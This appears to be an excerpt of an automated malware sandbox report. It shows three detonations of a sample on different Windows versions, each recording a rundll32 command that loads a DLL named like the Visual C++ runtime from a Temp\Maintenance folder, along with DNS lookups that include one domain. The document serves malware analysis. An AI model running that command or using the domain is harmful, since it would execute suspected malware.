2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10-20240404-en
Max time kernel
134s
Max time network
139s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140Org.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 235.137.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win11-20240508-en
Max time kernel
89s
Max time network
99s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140Org.dll,#1
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win7-20240419-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |